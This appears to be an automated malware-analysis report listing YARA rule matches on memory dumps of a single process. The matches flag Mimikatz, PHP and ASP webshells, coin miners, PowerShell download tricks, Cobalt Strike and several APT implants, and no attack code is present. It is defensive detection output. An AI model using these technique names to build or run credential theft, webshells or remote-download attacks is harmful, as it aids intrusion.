Source: 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6319425963.00000197A492C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6422770651.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6422770651.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6423333763.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6423333763.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT9002Strings author = Seth Hardy, description = 9002 Identifying Strings, last_modified = 2014-06-25
Source: 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000024.00000003.6337630194.00000197A492C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6343593773.00000197A4DA5000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6337978043.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000024.00000003.6332385174.00000197A4180000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp, type: MEMORY Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp, type: MEMORY Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6287415616.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6325869951.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 00000024.00000003.6309425115.00000197A492C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6354837161.00000197A4180000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6341599132.00000197A3621000.00000004.00000001.sdmp, type: MEMORY Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000024.00000003.6351629812.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000024.00000003.6350988033.00000197A3FA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6421798400.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6421798400.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6304560058.00000197A2FD4000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000024.00000003.6355645936.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6290353787.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6322218555.00000197A3016000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
